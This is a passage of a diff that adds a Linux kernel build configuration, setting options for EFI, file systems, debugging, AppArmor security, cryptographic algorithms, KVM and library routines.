+CONFIG_DMI_SCAN_MACHINE_NON_EFI_FALLBACK=y
+CONFIG_ISCSI_IBFT_FIND=y
+CONFIG_ISCSI_IBFT=m
+# CONFIG_FW_CFG_SYSFS is not set
+# CONFIG_GOOGLE_FIRMWARE is not set
+
+#
+# EFI (Extensible Firmware Interface) Support
+#
+CONFIG_EFI_VARS=y
+CONFIG_EFI_ESRT=y
+CONFIG_EFI_VARS_PSTORE=y
+# CONFIG_EFI_VARS_PSTORE_DEFAULT_DISABLE is not set
+CONFIG_EFI_FAKE_MEMMAP=y
+CONFIG_EFI_MAX_FAKE_MEM=8
+CONFIG_EFI_RUNTIME_WRAPPERS=y
+CONFIG_EFI_BOOTLOADER_CONTROL=y
+CONFIG_EFI_CAPSULE_LOADER=y
+CONFIG_EFI_TEST=y
+CONFIG_UEFI_CPER=y
+
+#
+# File systems
+#
+CONFIG_DCACHE_WORD_ACCESS=y
+CONFIG_FS_IOMAP=y
+CONFIG_EXT2_FS=y
+CONFIG_EXT2_FS_XATTR=y
+CONFIG_EXT2_FS_POSIX_ACL=y
+# CONFIG_EXT2_FS_SECURITY is not set
+CONFIG_EXT3_FS=m
+CONFIG_EXT3_FS_POSIX_ACL=y
+# CONFIG_EXT3_FS_SECURITY is not set
+CONFIG_EXT4_FS=y
+CONFIG_EXT4_FS_POSIX_ACL=y
+CONFIG_EXT4_FS_SECURITY=y
+CONFIG_EXT4_ENCRYPTION=y
+CONFIG_EXT4_FS_ENCRYPTION=y
+# CONFIG_EXT4_DEBUG is not set
+CONFIG_JBD2=y
+# CONFIG_JBD2_DEBUG is not set
+CONFIG_FS_MBCACHE=y
+CONFIG_REISERFS_FS=m
+# CONFIG_REISERFS_CHECK is not set
+# CONFIG_REISERFS_PROC_INFO is not set
+CONFIG_REISERFS_FS_XATTR=y
+CONFIG_REISERFS_FS_POSIX_ACL=y
+# CONFIG_REISERFS_FS_SECURITY is not set
+CONFIG_JFS_FS=m
+CONFIG_JFS_POSIX_ACL=y
+# CONFIG_JFS_SECURITY is not set
+# CONFIG_JFS_DEBUG is not set
+# CONFIG_JFS_STATISTICS is not set
+CONFIG_XFS_FS=m
+# CONFIG_XFS_QUOTA is not set
+CONFIG_XFS_POSIX_ACL=y
+# CONFIG_XFS_RT is not set
+# CONFIG_XFS_WARN is not set
+# CONFIG_XFS_DEBUG is not set
+# CONFIG_GFS2_FS is not set
+# CONFIG_OCFS2_FS is not set
+CONFIG_BTRFS_FS=m
+CONFIG_BTRFS_FS_POSIX_ACL=y
+# CONFIG_BTRFS_FS_CHECK_INTEGRITY is not set
+# CONFIG_BTRFS_FS_RUN_SANITY_TESTS is not set
+# CONFIG_BTRFS_DEBUG is not set
+# CONFIG_BTRFS_ASSERT is not set
+CONFIG_NILFS2_FS=m
+CONFIG_F2FS_FS=m
+# CONFIG_F2FS_STAT_FS is not set
+CONFIG_F2FS_FS_XATTR=y
+CONFIG_F2FS_FS_POSIX_ACL=y
+# CONFIG_F2FS_FS_SECURITY is not set
+# CONFIG_F2FS_CHECK_FS is not set
+# CONFIG_F2FS_FS_ENCRYPTION is not set
+# CONFIG_F2FS_FAULT_INJECTION is not set
+# CONFIG_FS_DAX is not set
+CONFIG_FS_POSIX_ACL=y
+CONFIG_EXPORTFS=y
+# CONFIG_EXPORTFS_BLOCK_OPS is not set
+CONFIG_FILE_LOCKING=y
+CONFIG_MANDATORY_FILE_LOCKING=y
+CONFIG_FS_ENCRYPTION=y
+CONFIG_FSNOTIFY=y
+CONFIG_DNOTIFY=y
+CONFIG_INOTIFY_USER=y
+CONFIG_FANOTIFY=y
+# CONFIG_FANOTIFY_ACCESS_PERMISSIONS is not set
+# CONFIG_QUOTA is not set
+# CONFIG_QUOTACTL is not set
+# CONFIG_AUTOFS4_FS is not set
+CONFIG_FUSE_FS=m
+# CONFIG_CUSE is not set
+CONFIG_OVERLAY_FS=y
+
+#
+# Caches
+#
+# CONFIG_FSCACHE is not set
+
+#
+# CD-ROM/DVD Filesystems
+#
+CONFIG_ISO9660_FS=m
+CONFIG_JOLIET=y
+CONFIG_ZISOFS=y
+CONFIG_UDF_FS=m
+CONFIG_UDF_NLS=y
+
+#
+# DOS/FAT/NT Filesystems
+#
+CONFIG_FAT_FS=m
+CONFIG_MSDOS_FS=m
+CONFIG_VFAT_FS=m
+CONFIG_FAT_DEFAULT_CODEPAGE=437
+CONFIG_FAT_DEFAULT_IOCHARSET="iso8859-1"
+# CONFIG_FAT_DEFAULT_UTF8 is not set
+CONFIG_NTFS_FS=m
+# CONFIG_NTFS_DEBUG is not set
+# CONFIG_NTFS_RW is not set
+
+#
+# Pseudo filesystems
+#
+CONFIG_PROC_FS=y
+# CONFIG_PROC_KCORE is not set
+CONFIG_PROC_SYSCTL=y
+CONFIG_PROC_PAGE_MONITOR=y
+# CONFIG_PROC_CHILDREN is not set
+CONFIG_KERNFS=y
+CONFIG_SYSFS=y
+CONFIG_TMPFS=y
+CONFIG_TMPFS_POSIX_ACL=y
+CONFIG_TMPFS_XATTR=y
+# CONFIG_HUGETLBFS is not set
+# CONFIG_HUGETLB_PAGE is not set
+CONFIG_ARCH_HAS_GIGANTIC_PAGE=y
+CONFIG_CONFIGFS_FS=y
+CONFIG_EFIVAR_FS=y
+CONFIG_MISC_FILESYSTEMS=y
+# CONFIG_ORANGEFS_FS is not set
+# CONFIG_ADFS_FS is not set
+# CONFIG_AFFS_FS is not set
+# CONFIG_ECRYPT_FS is not set
+# CONFIG_HFS_FS is not set
+CONFIG_HFSPLUS_FS=m
+# CONFIG_HFSPLUS_FS_POSIX_ACL is not set
+# CONFIG_BEFS_FS is not set
+# CONFIG_BFS_FS is not set
+# CONFIG_EFS_FS is not set
+# CONFIG_LOGFS is not set
+# CONFIG_CRAMFS is not set
+# CONFIG_SQUASHFS is not set
+# CONFIG_VXFS_FS is not set
+# CONFIG_MINIX_FS is not set
+# CONFIG_OMFS_FS is not set
+# CONFIG_HPFS_FS is not set
+# CONFIG_QNX4FS_FS is not set
+# CONFIG_QNX6FS_FS is not set
+# CONFIG_ROMFS_FS is not set
+CONFIG_PSTORE=y
+CONFIG_PSTORE_ZLIB_COMPRESS=y
+# CONFIG_PSTORE_LZO_COMPRESS is not set
+# CONFIG_PSTORE_LZ4_COMPRESS is not set
+# CONFIG_PSTORE_CONSOLE is not set
+# CONFIG_PSTORE_PMSG is not set
+# CONFIG_PSTORE_RAM is not set
+# CONFIG_SYSV_FS is not set
+CONFIG_UFS_FS=m
+# CONFIG_UFS_FS_WRITE is not set
+# CONFIG_UFS_DEBUG is not set
+# CONFIG_NETWORK_FILESYSTEMS is not set
+CONFIG_NLS=y
+CONFIG_NLS_DEFAULT="iso8859-1"
+CONFIG_NLS_CODEPAGE_437=m
+# CONFIG_NLS_CODEPAGE_737 is not set
+# CONFIG_NLS_CODEPAGE_775 is not set
+# CONFIG_NLS_CODEPAGE_850 is not set
+# CONFIG_NLS_CODEPAGE_852 is not set
+# CONFIG_NLS_CODEPAGE_855 is not set
+# CONFIG_NLS_CODEPAGE_857 is not set
+# CONFIG_NLS_CODEPAGE_860 is not set
+# CONFIG_NLS_CODEPAGE_861 is not set
+# CONFIG_NLS_CODEPAGE_862 is not set
+# CONFIG_NLS_CODEPAGE_863 is not set
+# CONFIG_NLS_CODEPAGE_864 is not set
+# CONFIG_NLS_CODEPAGE_865 is not set
+# CONFIG_NLS_CODEPAGE_866 is not set
+# CONFIG_NLS_CODEPAGE_869 is not set
+# CONFIG_NLS_CODEPAGE_936 is not set
+# CONFIG_NLS_CODEPAGE_950 is not set
+# CONFIG_NLS_CODEPAGE_932 is not set
+# CONFIG_NLS_CODEPAGE_949 is not set
+# CONFIG_NLS_CODEPAGE_874 is not set
+# CONFIG_NLS_ISO8859_8 is not set
+# CONFIG_NLS_CODEPAGE_1250 is not set
+# CONFIG_NLS_CODEPAGE_1251 is not set
+# CONFIG_NLS_ASCII is not set
+CONFIG_NLS_ISO8859_1=m
+# CONFIG_NLS_ISO8859_2 is not set
+# CONFIG_NLS_ISO8859_3 is not set
+# CONFIG_NLS_ISO8859_4 is not set
+# CONFIG_NLS_ISO8859_5 is not set
+# CONFIG_NLS_ISO8859_6 is not set
+# CONFIG_NLS_ISO8859_7 is not set
+# CONFIG_NLS_ISO8859_9 is not set
+# CONFIG_NLS_ISO8859_13 is not set
+# CONFIG_NLS_ISO8859_14 is not set
+CONFIG_NLS_ISO8859_15=m
+# CONFIG_NLS_KOI8_R is not set
+# CONFIG_NLS_KOI8_U is not set
+# CONFIG_NLS_MAC_ROMAN is not set
+# CONFIG_NLS_MAC_CELTIC is not set
+# CONFIG_NLS_MAC_CENTEURO is not set
+# CONFIG_NLS_MAC_CROATIAN is not set
+# CONFIG_NLS_MAC_CYRILLIC is not set
+# CONFIG_NLS_MAC_GAELIC is not set
+# CONFIG_NLS_MAC_GREEK is not set
+# CONFIG_NLS_MAC_ICELAND is not set
+# CONFIG_NLS_MAC_INUIT is not set
+# CONFIG_NLS_MAC_ROMANIAN is not set
+# CONFIG_NLS_MAC_TURKISH is not set
+CONFIG_NLS_UTF8=m
+# CONFIG_DLM is not set
+
+#
+# Kernel hacking
+#
+CONFIG_TRACE_IRQFLAGS_SUPPORT=y
+
+#
+# printk and dmesg options
+#
+# CONFIG_PRINTK_TIME is not set
+CONFIG_MESSAGE_LOGLEVEL_DEFAULT=4
+# CONFIG_BOOT_PRINTK_DELAY is not set
+# CONFIG_DYNAMIC_DEBUG is not set
+
+#
+# Compile-time checks and compiler options
+#
+# CONFIG_DEBUG_INFO is not set
+# CONFIG_ENABLE_WARN_DEPRECATED is not set
+# CONFIG_ENABLE_MUST_CHECK is not set
+CONFIG_FRAME_WARN=1024
+# CONFIG_STRIP_ASM_SYMS is not set
+# CONFIG_READABLE_ASM is not set
+# CONFIG_UNUSED_SYMBOLS is not set
+# CONFIG_PAGE_OWNER is not set
+CONFIG_DEBUG_FS=y
+# CONFIG_HEADERS_CHECK is not set
+# CONFIG_DEBUG_SECTION_MISMATCH is not set
+CONFIG_SECTION_MISMATCH_WARN_ONLY=y
+CONFIG_ARCH_WANT_FRAME_POINTERS=y
+# CONFIG_FRAME_POINTER is not set
+# CONFIG_STACK_VALIDATION is not set
+# CONFIG_DEBUG_FORCE_WEAK_PER_CPU is not set
+# CONFIG_MAGIC_SYSRQ is not set
+CONFIG_DEBUG_KERNEL=y
+
+#
+# Memory Debugging
+#
+CONFIG_PAGE_EXTENSION=y
+CONFIG_DEBUG_PAGEALLOC=y
+# CONFIG_DEBUG_PAGEALLOC_ENABLE_DEFAULT is not set
+CONFIG_PAGE_POISONING=y
+CONFIG_PAGE_POISONING_NO_SANITY=y
+CONFIG_PAGE_POISONING_ZERO=y
+# CONFIG_DEBUG_OBJECTS is not set
+# CONFIG_SLUB_DEBUG_ON is not set
+# CONFIG_SLUB_STATS is not set
+CONFIG_HAVE_DEBUG_KMEMLEAK=y
+# CONFIG_DEBUG_KMEMLEAK is not set
+# CONFIG_DEBUG_STACK_USAGE is not set
+# CONFIG_DEBUG_VM is not set
+# CONFIG_DEBUG_VIRTUAL is not set
+# CONFIG_DEBUG_MEMORY_INIT is not set
+# CONFIG_DEBUG_PER_CPU_MAPS is not set
+CONFIG_HAVE_DEBUG_STACKOVERFLOW=y
+# CONFIG_DEBUG_STACKOVERFLOW is not set
+CONFIG_HAVE_ARCH_KMEMCHECK=y
+# CONFIG_KMEMCHECK is not set
+CONFIG_HAVE_ARCH_KASAN=y
+# CONFIG_KASAN is not set
+CONFIG_ARCH_HAS_KCOV=y
+# CONFIG_KCOV is not set
+# CONFIG_DEBUG_SHIRQ is not set
+
+#
+# Debug Lockups and Hangs
+#
+# CONFIG_LOCKUP_DETECTOR is not set
+# CONFIG_DETECT_HUNG_TASK is not set
+# CONFIG_WQ_WATCHDOG is not set
+CONFIG_PANIC_ON_OOPS=y
+CONFIG_PANIC_ON_OOPS_VALUE=1
+CONFIG_PANIC_TIMEOUT=-1
+CONFIG_SCHED_DEBUG=y
+CONFIG_SCHED_INFO=y
+# CONFIG_SCHEDSTATS is not set
+CONFIG_SCHED_STACK_END_CHECK=y
+# CONFIG_DEBUG_TIMEKEEPING is not set
+# CONFIG_TIMER_STATS is not set
+
+#
+# Lock Debugging (spinlocks, mutexes, etc...)
+#
+# CONFIG_DEBUG_RT_MUTEXES is not set
+# CONFIG_DEBUG_SPINLOCK is not set
+# CONFIG_DEBUG_MUTEXES is not set
+# CONFIG_DEBUG_WW_MUTEX_SLOWPATH is not set
+# CONFIG_DEBUG_LOCK_ALLOC is not set
+# CONFIG_PROVE_LOCKING is not set
+# CONFIG_LOCK_STAT is not set
+# CONFIG_DEBUG_ATOMIC_SLEEP is not set
+# CONFIG_DEBUG_LOCKING_API_SELFTESTS is not set
+# CONFIG_LOCK_TORTURE_TEST is not set
+# CONFIG_STACKTRACE is not set
+# CONFIG_DEBUG_KOBJECT is not set
+CONFIG_DEBUG_BUGVERBOSE=y
+CONFIG_DEBUG_LIST=y
+# CONFIG_DEBUG_PI_LIST is not set
+CONFIG_DEBUG_SG=y
+CONFIG_DEBUG_NOTIFIERS=y
+CONFIG_DEBUG_CREDENTIALS=y
+
+#
+# RCU Debugging
+#
+# CONFIG_PROVE_RCU is not set
+# CONFIG_SPARSE_RCU_POINTER is not set
+# CONFIG_TORTURE_TEST is not set
+# CONFIG_RCU_PERF_TEST is not set
+# CONFIG_RCU_TORTURE_TEST is not set
+CONFIG_RCU_CPU_STALL_TIMEOUT=21
+# CONFIG_RCU_TRACE is not set
+# CONFIG_RCU_EQS_DEBUG is not set
+# CONFIG_DEBUG_WQ_FORCE_RR_CPU is not set
+# CONFIG_DEBUG_BLOCK_EXT_DEVT is not set
+CONFIG_CPU_HOTPLUG_STATE_CONTROL=y
+# CONFIG_NOTIFIER_ERROR_INJECTION is not set
+# CONFIG_FAULT_INJECTION is not set
+# CONFIG_LATENCYTOP is not set
+CONFIG_USER_STACKTRACE_SUPPORT=y
+CONFIG_HAVE_FUNCTION_TRACER=y
+CONFIG_HAVE_FUNCTION_GRAPH_TRACER=y
+CONFIG_HAVE_DYNAMIC_FTRACE=y
+CONFIG_HAVE_DYNAMIC_FTRACE_WITH_REGS=y
+CONFIG_HAVE_FTRACE_MCOUNT_RECORD=y
+CONFIG_HAVE_SYSCALL_TRACEPOINTS=y
+CONFIG_HAVE_FENTRY=y
+CONFIG_HAVE_C_RECORDMCOUNT=y
+CONFIG_TRACING_SUPPORT=y
+# CONFIG_FTRACE is not set
+
+#
+# Runtime Testing
+#
+# CONFIG_LKDTM is not set
+# CONFIG_TEST_LIST_SORT is not set
+# CONFIG_BACKTRACE_SELF_TEST is not set
+# CONFIG_RBTREE_TEST is not set
+# CONFIG_INTERVAL_TREE_TEST is not set
+# CONFIG_PERCPU_TEST is not set
+# CONFIG_ATOMIC64_SELFTEST is not set
+# CONFIG_ASYNC_RAID6_TEST is not set
+# CONFIG_TEST_HEXDUMP is not set
+# CONFIG_TEST_STRING_HELPERS is not set
+# CONFIG_TEST_KSTRTOX is not set
+# CONFIG_TEST_PRINTF is not set
+# CONFIG_TEST_BITMAP is not set
+# CONFIG_TEST_UUID is not set
+# CONFIG_TEST_RHASHTABLE is not set
+# CONFIG_TEST_HASH is not set
+# CONFIG_PROVIDE_OHCI1394_DMA_INIT is not set
+# CONFIG_DMA_API_DEBUG is not set
+# CONFIG_TEST_LKM is not set
+# CONFIG_TEST_USER_COPY is not set
+# CONFIG_TEST_BPF is not set
+# CONFIG_TEST_FIRMWARE is not set
+# CONFIG_TEST_UDELAY is not set
+# CONFIG_MEMTEST is not set
+# CONFIG_TEST_STATIC_KEYS is not set
+# CONFIG_SAMPLES is not set
+CONFIG_HAVE_ARCH_KGDB=y
+# CONFIG_KGDB is not set
+CONFIG_ARCH_HAS_UBSAN_SANITIZE_ALL=y
+# CONFIG_ARCH_WANTS_UBSAN_NO_NULL is not set
+# CONFIG_UBSAN is not set
+CONFIG_ARCH_HAS_DEVMEM_IS_ALLOWED=y
+CONFIG_STRICT_DEVMEM=y
+CONFIG_IO_STRICT_DEVMEM=y
+# CONFIG_X86_VERBOSE_BOOTUP is not set
+CONFIG_EARLY_PRINTK=y
+# CONFIG_EARLY_PRINTK_DBGP is not set
+# CONFIG_EARLY_PRINTK_EFI is not set
+CONFIG_X86_PTDUMP_CORE=y
+# CONFIG_X86_PTDUMP is not set
+CONFIG_EFI_PGT_DUMP=y
+CONFIG_DEBUG_RODATA_TEST=y
+CONFIG_DEBUG_WX=y
+# CONFIG_DEBUG_SET_MODULE_RONX is not set
+# CONFIG_DEBUG_NX_TEST is not set
+CONFIG_DOUBLEFAULT=y
+# CONFIG_DEBUG_TLBFLUSH is not set
+# CONFIG_IOMMU_DEBUG is not set
+# CONFIG_IOMMU_STRESS is not set
+CONFIG_HAVE_MMIOTRACE_SUPPORT=y
+CONFIG_IO_DELAY_TYPE_0X80=0
+CONFIG_IO_DELAY_TYPE_0XED=1
+CONFIG_IO_DELAY_TYPE_UDELAY=2
+CONFIG_IO_DELAY_TYPE_NONE=3
+CONFIG_IO_DELAY_0X80=y
+# CONFIG_IO_DELAY_0XED is not set
+# CONFIG_IO_DELAY_UDELAY is not set
+# CONFIG_IO_DELAY_NONE is not set
+CONFIG_DEFAULT_IO_DELAY_TYPE=0
+# CONFIG_DEBUG_BOOT_PARAMS is not set
+# CONFIG_CPA_DEBUG is not set
+# CONFIG_OPTIMIZE_INLINING is not set
+# CONFIG_DEBUG_ENTRY is not set
+# CONFIG_DEBUG_NMI_SELFTEST is not set
+CONFIG_X86_DEBUG_FPU=y
+# CONFIG_PUNIT_ATOM_DEBUG is not set
+
+#
+# Security options
+#
+CONFIG_KEYS=y
+CONFIG_PERSISTENT_KEYRINGS=y
+# CONFIG_BIG_KEYS is not set
+CONFIG_ENCRYPTED_KEYS=y
+CONFIG_KEY_DH_OPERATIONS=y
+CONFIG_SECURITY_DMESG_RESTRICT=y
+CONFIG_SECURITY=y
+CONFIG_PAGE_TABLE_ISOLATION=y
+CONFIG_SECURITYFS=y
+CONFIG_SECURITY_NETWORK=y
+# CONFIG_SECURITY_NETWORK_XFRM is not set
+CONFIG_SECURITY_PATH=y
+# CONFIG_INTEL_TXT is not set
+CONFIG_HAVE_HARDENED_USERCOPY_ALLOCATOR=y
+CONFIG_HAVE_ARCH_HARDENED_USERCOPY=y
+CONFIG_HARDENED_USERCOPY=y
+# CONFIG_HARDENED_USERCOPY_PAGESPAN is not set
+# CONFIG_SECURITY_SELINUX is not set
+# CONFIG_SECURITY_SMACK is not set
+# CONFIG_SECURITY_TOMOYO is not set
+CONFIG_SECURITY_APPARMOR=y
+CONFIG_SECURITY_APPARMOR_BOOTPARAM_VALUE=1
+CONFIG_SECURITY_APPARMOR_HASH=y
+CONFIG_SECURITY_APPARMOR_HASH_DEFAULT=y
+# CONFIG_SECURITY_LOADPIN is not set
+# CONFIG_SECURITY_YAMA is not set
+CONFIG_INTEGRITY=y
+# CONFIG_INTEGRITY_SIGNATURE is not set
+CONFIG_INTEGRITY_AUDIT=y
+# CONFIG_IMA is not set
+# CONFIG_EVM is not set
+CONFIG_DEFAULT_SECURITY_APPARMOR=y
+# CONFIG_DEFAULT_SECURITY_DAC is not set
+CONFIG_DEFAULT_SECURITY="apparmor"
+CONFIG_XOR_BLOCKS=y
+CONFIG_ASYNC_CORE=y
+CONFIG_ASYNC_MEMCPY=y
+CONFIG_ASYNC_XOR=y
+CONFIG_ASYNC_PQ=y
+CONFIG_ASYNC_RAID6_RECOV=y
+CONFIG_CRYPTO=y
+
+#
+# Crypto core or helper
+#
+CONFIG_CRYPTO_ALGAPI=y
+CONFIG_CRYPTO_ALGAPI2=y
+CONFIG_CRYPTO_AEAD=y
+CONFIG_CRYPTO_AEAD2=y
+CONFIG_CRYPTO_BLKCIPHER=y
+CONFIG_CRYPTO_BLKCIPHER2=y
+CONFIG_CRYPTO_HASH=y
+CONFIG_CRYPTO_HASH2=y
+CONFIG_CRYPTO_RNG=y
+CONFIG_CRYPTO_RNG2=y
+CONFIG_CRYPTO_RNG_DEFAULT=y
+CONFIG_CRYPTO_AKCIPHER2=y
+CONFIG_CRYPTO_AKCIPHER=y
+CONFIG_CRYPTO_KPP2=y
+CONFIG_CRYPTO_KPP=y
+CONFIG_CRYPTO_RSA=y
+CONFIG_CRYPTO_DH=y
+CONFIG_CRYPTO_ECDH=y
+CONFIG_CRYPTO_MANAGER=y
+CONFIG_CRYPTO_MANAGER2=y
+# CONFIG_CRYPTO_USER is not set
+CONFIG_CRYPTO_MANAGER_DISABLE_TESTS=y
+CONFIG_CRYPTO_GF128MUL=y
+CONFIG_CRYPTO_NULL=y
+CONFIG_CRYPTO_NULL2=y
+# CONFIG_CRYPTO_PCRYPT is not set
+CONFIG_CRYPTO_WORKQUEUE=y
+# CONFIG_CRYPTO_CRYPTD is not set
+# CONFIG_CRYPTO_MCRYPTD is not set
+CONFIG_CRYPTO_AUTHENC=y
+# CONFIG_CRYPTO_TEST is not set
+
+#
+# Authenticated Encryption with Associated Data
+#
+CONFIG_CRYPTO_CCM=y
+CONFIG_CRYPTO_GCM=y
+# CONFIG_CRYPTO_CHACHA20POLY1305 is not set
+CONFIG_CRYPTO_SEQIV=y
+CONFIG_CRYPTO_ECHAINIV=y
+
+#
+# Block modes
+#
+CONFIG_CRYPTO_CBC=y
+CONFIG_CRYPTO_CTR=y
+CONFIG_CRYPTO_CTS=y
+CONFIG_CRYPTO_ECB=y
+CONFIG_CRYPTO_LRW=y
+# CONFIG_CRYPTO_PCBC is not set
+CONFIG_CRYPTO_XTS=y
+# CONFIG_CRYPTO_KEYWRAP is not set
+
+#
+# Hash modes
+#
+CONFIG_CRYPTO_CMAC=y
+CONFIG_CRYPTO_HMAC=y
+CONFIG_CRYPTO_XCBC=y
+CONFIG_CRYPTO_VMAC=y
+
+#
+# Digest
+#
+CONFIG_CRYPTO_CRC32C=y
+# CONFIG_CRYPTO_CRC32C_INTEL is not set
+CONFIG_CRYPTO_CRC32=y
+# CONFIG_CRYPTO_CRC32_PCLMUL is not set
+CONFIG_CRYPTO_CRCT10DIF=y
+# CONFIG_CRYPTO_CRCT10DIF_PCLMUL is not set
+CONFIG_CRYPTO_GHASH=y
+# CONFIG_CRYPTO_POLY1305 is not set
+# CONFIG_CRYPTO_POLY1305_X86_64 is not set
+CONFIG_CRYPTO_MD4=y
+CONFIG_CRYPTO_MD5=y
+CONFIG_CRYPTO_MICHAEL_MIC=y
+# CONFIG_CRYPTO_RMD128 is not set
+CONFIG_CRYPTO_RMD160=y
+CONFIG_CRYPTO_RMD256=y
+CONFIG_CRYPTO_RMD320=y
+CONFIG_CRYPTO_SHA1=y
+# CONFIG_CRYPTO_SHA1_SSSE3 is not set
+# CONFIG_CRYPTO_SHA256_SSSE3 is not set
+# CONFIG_CRYPTO_SHA512_SSSE3 is not set
+# CONFIG_CRYPTO_SHA1_MB is not set
+# CONFIG_CRYPTO_SHA256_MB is not set
+# CONFIG_CRYPTO_SHA512_MB is not set
+CONFIG_CRYPTO_SHA256=y
+CONFIG_CRYPTO_SHA512=y
+CONFIG_CRYPTO_SHA3=y
+CONFIG_CRYPTO_TGR192=y
+CONFIG_CRYPTO_WP512=y
+# CONFIG_CRYPTO_GHASH_CLMUL_NI_INTEL is not set
+
+#
+# Ciphers
+#
+CONFIG_CRYPTO_AES=y
+# CONFIG_CRYPTO_AES_X86_64 is not set
+# CONFIG_CRYPTO_AES_NI_INTEL is not set
+CONFIG_CRYPTO_ANUBIS=y
+CONFIG_CRYPTO_ARC4=y
+CONFIG_CRYPTO_BLOWFISH=y
+CONFIG_CRYPTO_BLOWFISH_COMMON=y
+# CONFIG_CRYPTO_BLOWFISH_X86_64 is not set
+CONFIG_CRYPTO_CAMELLIA=y
+# CONFIG_CRYPTO_CAMELLIA_X86_64 is not set
+# CONFIG_CRYPTO_CAMELLIA_AESNI_AVX_X86_64 is not set
+# CONFIG_CRYPTO_CAMELLIA_AESNI_AVX2_X86_64 is not set
+CONFIG_CRYPTO_CAST_COMMON=y
+CONFIG_CRYPTO_CAST5=y
+# CONFIG_CRYPTO_CAST5_AVX_X86_64 is not set
+CONFIG_CRYPTO_CAST6=y
+# CONFIG_CRYPTO_CAST6_AVX_X86_64 is not set
+CONFIG_CRYPTO_DES=y
+CONFIG_CRYPTO_DES3_EDE_X86_64=y
+# CONFIG_CRYPTO_FCRYPT is not set
+# CONFIG_CRYPTO_KHAZAD is not set
+# CONFIG_CRYPTO_SALSA20 is not set
+# CONFIG_CRYPTO_SALSA20_X86_64 is not set
+# CONFIG_CRYPTO_CHACHA20 is not set
+# CONFIG_CRYPTO_CHACHA20_X86_64 is not set
+# CONFIG_CRYPTO_SEED is not set
+CONFIG_CRYPTO_SERPENT=y
+# CONFIG_CRYPTO_SERPENT_SSE2_X86_64 is not set
+# CONFIG_CRYPTO_SERPENT_AVX_X86_64 is not set
+# CONFIG_CRYPTO_SERPENT_AVX2_X86_64 is not set
+# CONFIG_CRYPTO_TEA is not set
+CONFIG_CRYPTO_TWOFISH=y
+CONFIG_CRYPTO_TWOFISH_COMMON=y
+# CONFIG_CRYPTO_TWOFISH_X86_64 is not set
+# CONFIG_CRYPTO_TWOFISH_X86_64_3WAY is not set
+# CONFIG_CRYPTO_TWOFISH_AVX_X86_64 is not set
+
+#
+# Compression
+#
+CONFIG_CRYPTO_DEFLATE=y
+CONFIG_CRYPTO_LZO=y
+CONFIG_CRYPTO_842=y
+CONFIG_CRYPTO_LZ4=y
+CONFIG_CRYPTO_LZ4HC=y
+
+#
+# Random Number Generation
+#
+CONFIG_CRYPTO_ANSI_CPRNG=y
+CONFIG_CRYPTO_DRBG_MENU=y
+CONFIG_CRYPTO_DRBG_HMAC=y
+# CONFIG_CRYPTO_DRBG_HASH is not set
+# CONFIG_CRYPTO_DRBG_CTR is not set
+CONFIG_CRYPTO_DRBG=y
+CONFIG_CRYPTO_JITTERENTROPY=y
+# CONFIG_CRYPTO_USER_API_HASH is not set
+# CONFIG_CRYPTO_USER_API_SKCIPHER is not set
+# CONFIG_CRYPTO_USER_API_RNG is not set
+# CONFIG_CRYPTO_USER_API_AEAD is not set
+CONFIG_CRYPTO_HASH_INFO=y
+# CONFIG_CRYPTO_HW is not set
+CONFIG_ASYMMETRIC_KEY_TYPE=y
+CONFIG_ASYMMETRIC_PUBLIC_KEY_SUBTYPE=y
+CONFIG_X509_CERTIFICATE_PARSER=y
+CONFIG_PKCS7_MESSAGE_PARSER=y
+# CONFIG_PKCS7_TEST_KEY is not set
+# CONFIG_SIGNED_PE_FILE_VERIFICATION is not set
+
+#
+# Certificates for signature checking
+#
+CONFIG_MODULE_SIG_KEY="certs/signing_key.pem"
+CONFIG_SYSTEM_TRUSTED_KEYRING=y
+CONFIG_SYSTEM_TRUSTED_KEYS=""
+# CONFIG_SYSTEM_EXTRA_CERTIFICATE is not set
+# CONFIG_SECONDARY_TRUSTED_KEYRING is not set
+CONFIG_HAVE_KVM=y
+CONFIG_HAVE_KVM_IRQCHIP=y
+CONFIG_HAVE_KVM_IRQFD=y
+CONFIG_HAVE_KVM_IRQ_ROUTING=y
+CONFIG_HAVE_KVM_EVENTFD=y
+CONFIG_KVM_MMIO=y
+CONFIG_KVM_ASYNC_PF=y
+CONFIG_HAVE_KVM_MSI=y
+CONFIG_HAVE_KVM_CPU_RELAX_INTERCEPT=y
+CONFIG_KVM_VFIO=y
+CONFIG_KVM_GENERIC_DIRTYLOG_READ_PROTECT=y
+CONFIG_HAVE_KVM_IRQ_BYPASS=y
+CONFIG_VIRTUALIZATION=y
+CONFIG_KVM=y
+CONFIG_KVM_INTEL=y
+CONFIG_KVM_AMD=y
+# CONFIG_KVM_DEVICE_ASSIGNMENT is not set
+CONFIG_VHOST_NET=y
+CONFIG_VHOST_VSOCK=y
+CONFIG_VHOST=y
+CONFIG_VHOST_CROSS_ENDIAN_LEGACY=y
+# CONFIG_BINARY_PRINTF is not set
+
+#
+# Library routines
+#
+CONFIG_RAID6_PQ=y
+CONFIG_BITREVERSE=y
+# CONFIG_HAVE_ARCH_BITREVERSE is not set
+CONFIG_RATIONAL=y
+CONFIG_GENERIC_STRNCPY_FROM_USER=y
+CONFIG_GENERIC_STRNLEN_USER=y
+CONFIG_GENERIC_NET_UTILS=y
+CONFIG_GENERIC_FIND_FIRST_BIT=y
+CONFIG_GENERIC_PCI_IOMAP=y
+CONFIG_GENERIC_IOMAP=y
+CONFIG_GENERIC_IO=y
+CONFIG_ARCH_USE_CMPXCHG_LOCKREF=y
+CONFIG_ARCH_HAS_FAST_MULTIPLIER=y
+CONFIG_CRC_CCITT=y
+CONFIG_CRC16=y
+CONFIG_CRC_T10DIF=y
+CONFIG_CRC_ITU_T=y
+CONFIG_CRC32=y
+# CONFIG_CRC32_SELFTEST is not set
+CONFIG_CRC32_SLICEBY8=y
+# CONFIG_CRC32_SLICEBY4 is not set
+# CONFIG_CRC32_SARWATE is not set
+# CONFIG_CRC32_BIT is not set
+CONFIG_CRC7=y
+CONFIG_LIBCRC32C=y
+CONFIG_CRC8=y
+# CONFIG_AUDIT_ARCH_COMPAT_GENERIC is not set
+# CONFIG_RANDOM32_SELFTEST is not set
+CONFIG_842_COMPRESS=y
+CONFIG_842_DECOMPRESS=y
+CONFIG_ZLIB_INFLATE=y
+CONFIG_ZLIB_DEFLATE=y
+CONFIG_LZO_COMPRESS=y
+CONFIG_LZO_DECOMPRESS=y
+CONFIG_LZ4_COMPRESS=y
+CONFIG_LZ4HC_COMPRESS=y
+CONFIG_LZ4_DECOMPRESS=y
+CONFIG_XZ_DEC=y
+CONFIG_XZ_DEC_X86=y
